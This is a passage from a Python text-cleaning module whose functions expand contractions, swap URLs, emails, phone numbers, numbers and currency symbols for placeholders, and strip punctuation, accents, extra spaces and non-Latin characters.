263 | )
264 | text = constants.CONTRACTION_LL_WILL.sub(
265 | r"\1\2 will",
266 | text,
267 | )
268 | text = constants.CONTRACTION_RE_ARE.sub(r"\1\2 are", text)
269 | text = constants.CONTRACTION_VE_HAVE.sub(
270 | r"\1\2 have",
271 | text,
272 | )
273 | text = constants.CONTRACTION_CANT_CANNOT.sub(r"\1\2n not", text)
274 | text = constants.CONTRACTION_M_AM.sub(r"\1\2 am", text)
275 | text = constants.CONTRACTION_LET_LETUS.sub(r"\1\2 us", text)
276 | text = constants.CONTRACTION_WONT_WILLNOT.sub(r"\1\2ill not", text)
277 | text = constants.CONTRACTION_SHANT_SHALLNOT.sub(r"\1\2hall not", text)
278 | text = constants.CONTRACTION_YALL_YOUALL.sub(r"\1\2ou all", text)
279 | return text
280 |
281 |
282 | def replace_urls(text: str, replace_with: str = "*URL*") -> str:
283 | """
284 | ----
285 | Copyright 2016 Chartbeat, Inc.
286 | Code from textacy: https://github.com/chartbeat-labs/textacy
287 | ----
288 |
289 | Replace all URLs in ``text`` str with ``replace_with`` str.
290 |
291 | Parameters
292 | ----------
293 | text : string
294 | replace_with : string
295 | the string you want the URL to be replaced with.
296 |
297 | Returns
298 | -------
299 | string
300 | """
301 | text = constants.URL_REGEX.sub(replace_with, constants.SHORT_URL_REGEX.sub(replace_with, text))
302 | return text
303 |
304 |
305 | def replace_emails(text: str, replace_with: str = "*EMAIL*") -> str:
306 | """
307 | ----
308 | Copyright 2016 Chartbeat, Inc.
309 | Code from textacy: https://github.com/chartbeat-labs/textacy
310 | ----
311 |
312 | Replace all emails in ``text`` str with ``replace_with`` str
313 |
314 | Parameters
315 | ----------
316 | text : string
317 | replace_with : string
318 | the string you want the email address to be replaced with.
319 |
320 | Returns
321 | -------
322 | string
323 | """
324 | text = constants.EMAIL_REGEX.sub(replace_with, text)
325 | return text
326 |
327 |
328 | def replace_phone_numbers(
329 | text: str,
330 | country_to_detect: List[Optional[str]],
331 | replace_with: str = "*PHONE*",
332 | method: str = "regex",
333 | ) -> str:
334 | """
335 | ----
336 | Copyright 2016 Chartbeat, Inc.
337 | Inspired code from textacy: https://github.com/chartbeat-labs/textacy
338 | ----
339 |
340 | Replace all phone numbers in ``text`` str with ``replace_with`` str
341 |
342 | Parameters
343 | ----------
344 | text : string
345 | replace_with : string
346 | the string you want the phone number to be replaced with.
347 | method : ['regex','detection']
348 | regex is faster but will omit a lot of numbers, while detection will
349 | catch every numbers, but takes a while.
350 | country_to_detect : list
351 | If a list of country code is specified, will catch every number
352 | formatted.
353 | Only when method = 'detection'.
354 |
355 | Returns
356 | -------
357 | string
358 | """
359 | if method == "regex":
360 | text = constants.PHONE_REGEX.sub(replace_with, text)
361 | elif method == "detection":
362 | found_nums = _extract_phone_numbers(text, countrylist=country_to_detect)
363 |
364 | # order by lenght to avoid truncated numbers to be removed first.
365 | found_nums.sort(key=len, reverse=True)
366 | for phone_number in found_nums:
367 | text = text.replace(phone_number, replace_with)
368 | else:
369 | raise ValueError(
370 | 'Please input a valid method between "regex" or \
371 | "detection"'
372 | )
373 | return text
374 |
375 |
376 | def replace_numbers(text: str, replace_with: str = "*NUMBER*") -> str:
377 | """
378 | ----
379 | Copyright 2016 Chartbeat, Inc.
380 | Code from textacy: https://github.com/chartbeat-labs/textacy
381 | ----
382 |
383 | Replace all numbers in ``text`` str with ``replace_with`` str.
384 |
385 | Parameters
386 | ----------
387 | text : string
388 | replace_with : string
389 | the string you want the number to be replaced with.
390 |
391 | Returns
392 | -------
393 | string
394 | """
395 | text = constants.NUMBERS_REGEX.sub(replace_with, text)
396 | return text
397 |
398 |
399 | def replace_currency_symbols(text: str, replace_with: Optional[str] = None) -> str:
400 | """
401 | ----
402 | Copyright 2016 Chartbeat, Inc.
403 | Code from textacy: https://github.com/chartbeat-labs/textacy
404 | ----
405 |
406 | Replace all currency symbols in ``text`` str with string specified by
407 | ``replace_with`` str.
408 |
409 | Parameters
410 | ----------
411 | text : str
412 | raw text
413 | replace_with : None or string
414 | if None (default), replace symbols with
415 | their standard 3-letter abbreviations (e.g. '$' with 'USD', '£'
416 | with 'GBP'); otherwise, pass in a string with which to replace all
417 | symbols (e.g. "*CURRENCY*")
418 |
419 | Returns
420 | -------
421 | string
422 | """
423 | if replace_with is None:
424 | for k, v in constants.CURRENCIES.items():
425 | text = text.replace(k, v)
426 | else:
427 | text = constants.CURRENCY_REGEX.sub(replace_with, text)
428 | return text
429 |
430 |
431 | def remove_punct(text: str, marks: Optional[str] = None) -> str:
432 | """
433 | Remove punctuation from ``text`` by replacing all instances of ``marks``
434 | with whitespace.
435 |
436 | Parameters
437 | ----------
438 | text : str
439 | raw text
440 |
441 | marks : str or None
442 | If specified, remove only the characters in this string,
443 | e.g. ``marks=',;:'`` removes commas, semi-colons, and colons.
444 | Otherwise, all punctuation marks are removed.
445 |
446 | Returns
447 | -------
448 | string
449 |
450 | Note
451 | -------
452 | When ``marks=None``, Python's built-in :meth:`str.translate()` is
453 | used to remove punctuation; otherwise, a regular expression is used
454 | instead. The former's performance is about 5-10x faster.
455 | """
456 | if marks:
457 | text = re.sub(f"[{re.escape(marks)}]+", " ", text, flags=re.UNICODE)
458 | else:
459 | text = text.translate(constants.PUNCT_TRANSLATE_UNICODE)
460 | return text
461 |
462 |
463 | def remove_accents(text: str, method: str = "unicode") -> str:
464 | """
465 | Remove accents from any accented unicode characters in ``text`` str,
466 | either by transforming them into ascii equivalents or removing them
467 | entirely.
468 |
469 | Parameters
470 | ----------
471 | text : str
472 | raw text
473 |
474 | method : ({'unicode', 'ascii'})
475 | if 'unicode', remove accented
476 | char for any unicode symbol with a direct ASCII equivalent; if 'ascii',
477 | remove accented char for any unicode symbol
478 |
479 | NB: the 'ascii' method is notably faster than 'unicode', but less good
480 |
481 | Returns
482 | -------
483 | string
484 |
485 | Raises
486 | ------
487 | ValueError
488 | if ``method`` is not in {'unicode', 'ascii'}
489 | """
490 | if method == "unicode":
491 | text = "".join(
492 | c for c in unicodedata.normalize("NFKD", text) if not unicodedata.combining(c)
493 | )
494 | elif method == "ascii":
495 | text = unicodedata.normalize("NFKD", text).encode("ascii", errors="ignore").decode("ascii")
496 | else:
497 | msg = f'`method` must be either "unicode" and "ascii", not {method}'
498 | raise ValueError(msg)
499 | return text
500 |
501 |
502 | def remove_multiple_spaces_and_strip_text(text: str) -> str:
503 | """
504 | Remove multiple spaces, strip text, and remove '-', '*' characters.
505 |
506 | Parameters
507 | ----------
508 | text : str
509 | the text to be processed
510 |
511 | Returns
512 | -------
513 | string
514 | the text with removed multiple spaces and strip text
515 | """
516 | regex_remove_multiple_spaces_list = ["\\t", "[\\s\\-\\*]{2,}"]
517 | for regex_remove_multiple_spaces in regex_remove_multiple_spaces_list:
518 | text = re.sub(regex_remove_multiple_spaces, " ", text)
519 | text = text.strip()
520 | return text
521 |
522 |
523 | def filter_non_latin_characters(text: str) -> str:
524 | """
525 | Function that filters non latin characters of a text.
526 |
527 | Parameters
528 | ----------
529 | text : string
530 |
531 | Returns
532 | -------
533 | string
534 | """
535 | text = constants.LATIN_CHARACTERS_RE.sub(" ", text)
536 | text = normalize_whitespace(text)
537 | return text
538 |
--------------------------------------------------------------------------------